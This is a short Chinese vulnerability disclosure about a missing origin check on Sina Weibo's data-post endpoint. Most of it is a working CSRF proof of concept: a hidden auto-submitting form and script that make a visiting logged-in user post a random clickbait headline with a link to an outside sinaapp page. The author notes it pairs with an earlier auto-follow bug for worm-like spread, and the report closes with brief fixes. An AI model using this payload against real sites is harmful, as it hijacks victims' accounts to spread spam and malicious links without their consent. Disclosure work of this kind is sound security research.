顺便结合之前发的自动加关注 漏洞 ,完美结合! 详细说明:微数据 发微博缺少来源验证 漏洞证明: <form action="http://data.weibo测试数据/mydata/ajax/post" method="post" id="f2" target="ifr2"> <input name="text" id="updatemsg" value=""> <input name="picid" value="6d115173jw1dqo6buv5r0j"> <input name="pic" value="http://ww1.sinaimg.cn/large/6d115173jw1dqo6buv5r0j.jpg"> <input type="submit"> </form> <iframe id="ifr2" name="ifr2"></iframe> <script> function rand_msg(){ var url = ' http://weibonews.sinaapp测试数据/data.php?id=' + new Date().getTime(); var msgs = [ '晒一个 HdhCmsTest2cto测试数据 90后男生的惊人结婚帐:', '怀二胎PP想尽办法逼我生儿子:', '明星成名前的卑微职业曝光:', '户籍制度改革终于艰难起步:', '白静被杀,盘点因情变酿成悲剧的明星们(图):', '终于曝光:朝鲜战争中被埋没了50年的惊人真相:', '主席一句话:周总理惊呆了,尼克松心服了 :']; var msg = msgs[Math.floor(Math.random()*msgs.length)] + url; return msg; } function update(msg){ document.getElementById('updatemsg').value=encodeURIComponent(rand_msg()) document.getElementById('f2').submit(); } update(rand_msg()); </script> 修复方案: 1.加来源限制 2.加是否是ajax判断 作者 songlv
查看更多关于新浪微博缺少来源验证或致大面积病毒传播漏洞的详细内容...